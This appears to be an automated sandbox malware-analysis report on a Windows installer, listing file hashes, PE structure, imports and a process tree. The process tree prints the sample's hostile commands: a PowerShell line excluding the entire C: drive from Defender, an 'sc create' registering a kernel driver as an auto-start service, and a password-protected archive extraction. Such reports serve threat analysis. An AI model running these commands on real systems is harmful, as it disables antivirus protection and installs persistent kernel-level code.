                            SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                            SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                            SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                            Malicious:false
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:false
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530564726182663
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:F0D4EEA505CEB561AB4AD622E3C0B9D5
                            SHA1:70CB1C9B1E2A3B544A587225AB9D8AADB7B72395
                            SHA-256:1881A519E644331856A6B867FC1827BB2AFF3D7D3046CB745E1A73934354C539
                            SHA-512:0FAC2790242C0D65F541B0EBA14C411E505CC0C50166A289E478525C56FA845C6AF115E51993C3739358367DE3C47E1044A9CC4237F8149A8ABD637F30269058
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:false
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):406
                            Entropy (8bit):5.117520345541057
                            Encrypted:false
                            SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                            MD5:9200058492BCA8F9D88B4877F842C148
                            SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                            SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                            SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                            Malicious:false
                            Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.95914765295349
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 98.04%
                            • Inno Setup installer (109748/4) 1.08%
                            • InstallShield setup (43055/19) 0.42%
                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            File name:#U5b89#U88c5#U52a9#U624b1.0.1.exe
                            File size:8'595'621 bytes
                            MD5:f2845d6410a0d9a090d414f3ae742e3b
                            SHA1:a27e62687254f001c08b5313465d2ed1870f0eb5
                            SHA256:f56c3d038c408355f6fb191865ca5650b29926f65b78d02b008b509bf640e588
                            SHA512:48261d07b5f44f89414ceca11345413f97388e78a5d7f9dd56bf2a4520083150d9fe20ac11160274f457cfadb0b4bfea685135cb1f1ed2da288a488085a738c6
                            SSDEEP:196608:lWLc3zOIl9n+GOdz13XOJqJfWovaeOTX8I0JGZI24j:lWLiqGn+B3X6O+ovEsIm
                            TLSH:2E862213F2CBD43EE45E0B3B15B2A25454FB7A256826AE5386ECB4ECCF250501D3E64B
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                            Icon Hash:0c0c2d33ceec80aa
                            Entrypoint:0x4a83bc
                            Entrypoint Section:.itext
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:1
                            File Version Major:6
                            File Version Minor:1
                            Subsystem Version Major:6
                            Subsystem Version Minor:1
                            Import Hash:40ab50289f7ef5fae60801f88d4541fc
                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFA4h
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            mov dword ptr [ebp-3Ch], eax
                            mov dword ptr [ebp-40h], eax
                            mov dword ptr [ebp-5Ch], eax
                            mov dword ptr [ebp-30h], eax
                            mov dword ptr [ebp-38h], eax
                            mov dword ptr [ebp-34h], eax
                            mov dword ptr [ebp-2Ch], eax
                            mov dword ptr [ebp-28h], eax
                            mov dword ptr [ebp-14h], eax
                            mov eax, 004A2EBCh
                            call 00007FD4C540CE65h
                            xor eax, eax
                            push ebp
                            push 004A8AC1h
                            push dword ptr fs:[eax]
                            mov dword ptr fs:[eax], esp
                            xor edx, edx
                            push ebp
                            push 004A8A7Bh
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            mov eax, dword ptr [004B0634h]
                            call 00007FD4C549E7EBh
                            call 00007FD4C549E33Eh
                            lea edx, dword ptr [ebp-14h]
                            xor eax, eax
                            call 00007FD4C5499018h
                            mov edx, dword ptr [ebp-14h]
                            mov eax, 004B41F4h
                            call 00007FD4C5406F13h
                            push 00000002h
                            push 00000000h
                            push 00000001h
                            mov ecx, dword ptr [004B41F4h]
                            mov dl, 01h
                            mov eax, dword ptr [0049CD14h]
                            call 00007FD4C549A343h
                            mov dword ptr [004B41F8h], eax
                            xor edx, edx
                            push ebp
                            push 004A8A27h
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            call 00007FD4C549E873h
                            mov dword ptr [004B4200h], eax
                            mov eax, dword ptr [004B4200h]
                            cmp dword ptr [eax+0Ch], 01h
                            jne 00007FD4C54A555Ah
                            mov eax, dword ptr [004B4200h]
                            mov edx, 00000028h
                            call 00007FD4C549AC38h
                            mov edx, dword ptr [004B4200h]
                            | Name | Virtual Address | Virtual Size | Is in Section |
                            | --- | --- | --- | --- |
                            | IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata |
                            | IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata |
                            | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc |
                            | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc |
                            | IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata |
                            | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata |
                            | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata |
                            | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
                            | Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
                            | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
                            | .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
                            | .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
                            | .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                            | .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                            | .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                            | .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                            | .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
                            | .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                            | .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
                            | .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
                            | .rsrc | 0xcb000 | 0x11000 | 0x11000 | ae78e7ec4c172739526732707a28f0f9 | False | 0.187744140625 | data | 3.7229388634712897 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
                            | Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
                            | --- | --- | --- | --- | --- | --- | --- |
                            | RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925 |
                            | RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268 |
                            | RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547 |
                            | RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863 |
                            | RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095 |
                            | RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516 |
                            | RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838 |
                            | RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341 |
                            | RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024 |
                            | RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642 |
                            | RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834 |
                            | RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103 |
                            | RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532 |
                            | RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795 |
                            | RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575 |
                            | RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223 |
                            | RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635 |
                            | RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574 |
                            | RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826 |
                            | RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411 |
                            | RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231 |
                            | RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913 |
                            | RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027 |
                            | RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083 |
                            | RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5 |
                            | RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102 |
                            | RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1818181818181819 |
                            | RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447 |
                            | RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2769121813031161 |
                            | RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163 |
                            | DLL | Import |
                            | --- | --- |
                            | kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale |
                            | comctl32.dll | InitCommonControls |
                            | user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW |
                            | oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate |
                            | advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey |
                            | Name | Ordinal | Address |
                            | --- | --- | --- |
                            | __dbk_fcall_wrapper | 2 | 0x40fc10 |
                            | dbkFCallWrapperAddr | 1 | 0x4b063c |
                            | Language of compilation system | Country where language is spoken |
                            | --- | --- |
                            | English | United States |
                            No network behavior found

                            Target ID:0
                            Start time:22:52:01
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe"
                            Imagebase:0x900000
                            File size:8'595'621 bytes
                            MD5 hash:F2845D6410A0D9A090D414F3AE742E3B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:22:52:02
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20474,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe"
                            Imagebase:0xce0000
                            File size:3'366'912 bytes
                            MD5 hash:F0D4EEA505CEB561AB4AD622E3C0B9D5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:3
                            Start time:22:52:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:22:52:02
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:22:52:03
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT
                            Imagebase:0x900000
                            File size:8'595'621 bytes
                            MD5 hash:F2845D6410A0D9A090D414F3AE742E3B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:false

                            Target ID:6
                            Start time:22:52:04
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20492,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT
                            Imagebase:0xa50000
                            File size:3'366'912 bytes
                            MD5 hash:F0D4EEA505CEB561AB4AD622E3C0B9D5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:7
                            Start time:22:52:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:22:52:07
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:9
                            Start time:22:52:07
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:22:52:07
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                            Imagebase:0x710000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Reputation:moderate
                            Has exited:true

                            Target ID:11
                            Start time:22:52:07
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
